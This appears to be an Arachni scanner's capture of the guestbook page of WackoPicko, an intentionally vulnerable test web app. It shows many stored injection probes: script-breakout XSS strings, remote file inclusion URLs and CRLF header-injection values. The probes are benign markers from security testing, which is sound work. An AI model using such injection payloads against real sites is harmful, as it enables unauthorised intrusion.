<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
<p> - by arachni_name </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
<p class="comment">1</p>
<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
<p> - by arachni_name </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p> <p class="comment">1</p> <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p> <p> - by arachni_name </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by */; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p> <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p> <p class="comment">1</p> <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p> <p class="comment"> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">*/; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p> <p> - by arachni_name </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1</p> <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by 1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p> <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p> <p> - by arachni_name </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1; window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p> <p> - by arachni_name </p> <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p> <p> - by arachni_name </p> <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p> <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p> <p class="comment">1</p> <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">1</p> <p> - by X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p> <p class="comment">1 X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name </p> <p class="comment"> X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1</p> <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p> <p> - by arachni_name </p> <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p> <p class="comment">Hi, I love your site!</p> <p> - by adam </p> <form action="/WackoPicko/guestbook.php" method="POST"> Name: <br> <input type="text" name="name"><br> Comment: <br> <textarea id="comment-box" name="comment"></textarea> <br> <input type="submit" value="Submit"> </form> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a 